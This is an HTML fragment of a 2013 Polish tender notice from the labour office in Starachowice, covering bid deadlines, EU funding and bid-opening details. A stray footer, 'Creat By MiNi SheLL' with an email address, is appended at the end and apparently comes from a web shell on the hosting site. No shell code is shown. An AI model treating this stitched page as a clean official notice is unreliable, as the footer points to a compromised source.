<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2013 godzina 12:00, miejsce: Siedziba Zamawiającego: Powiatowy Urząd Pracy w Starachowicach ul. Radomska 76, w pokoju 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -  Zamawiający nie dopuszcza składania ofert częściowych.
-  Zamawiający nie dopuszcza składania ofert wariantowych.
-  Zamawiający nie przewiduje zamówień uzupełniających.
-  Zamawiający nie przewiduje zawarcia umowy ramowej.
-  Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
-  Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
-  Zamówienie jest finansowane ze środków Unii Europejskiej w ramach dwóch projektów:
   Profesjonalny pośrednik - dostępny Urząd, Profesjonalizm naszą dewizą - uśmiech naszą wizytówką 
   współfinansowanych ze środków Europejskiego Funduszu Społecznego, realizowanego z Programu  
   Operacyjnego Kapitał Ludzki - Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1   
   Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie  
   6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji 
   zawodowej osób bezrobotnych w regionie
-  Otwarcie ofert nastąpi w dniu 23.05.2013 r. o godz. 12:10 w siedzibie Zamawiającego 
w pokoju  nr 208. Otwarcie ofert jest jawne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com